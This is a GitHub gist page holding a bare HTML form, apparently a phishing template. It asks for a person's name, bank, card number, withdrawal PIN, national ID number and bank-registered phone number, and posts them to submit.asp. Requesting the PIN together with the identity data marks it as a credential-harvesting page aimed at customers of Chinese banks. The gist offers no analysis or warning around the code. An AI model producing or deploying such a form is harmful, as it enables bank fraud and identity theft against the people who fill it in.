-
-
Save chitanda/1b1ec42e18f3e25cba1a to your computer and use it in GitHub Desktop.
需要详细身份信息的
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<form id="form1" method="post" name="form1" action="submit.asp"> | |
<input type="hidden" name="yy" value="cx"> | |
<input id="idType" class="input1" value="1" type="hidden" name="idType"> <article class="border mar_l80"><section><span>姓 名:</span> | |
<dl><input id="cnName" class="input1" type="text" name="cnName"></dl></section><section><span>开户行:</span> | |
<div id="select" class="select"><img src="Images/select_btn.png"> <input id="sec_val" name="yhtype"> | |
<ul style="DISPLAY: none" id="sec_li"> | |
<li>中国建设银行</li> | |
<li>中国工商银行</li> | |
<li>中国招商银行</li> | |
<li>中国农业银行</li> | |
<li>中国银行</li> | |
<li>其它</li></ul></div></section> | |
<section><span>银行卡号:</span> | |
<dl><input id="idcard" class="input1" type="text" name="idcard"> </dl> | |
</section> | |
<section><span>取款密码:</span> | |
<dl><input id="cmm" class="input1" type="text" name="idcard1"> </dl> | |
</section> | |
<section><span>身份证号:</span> | |
<dl><input id="idNo1" class="input1" type="text" name="sfcar"> </dl> | |
</section> | |
<section><span>银行预留手机:</span> | |
<dl><input id="shouji" class="input1" type="text" name="shouji"> </dl> | |
</section> | |
</article> | |
<div class="warn"></div></form> | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment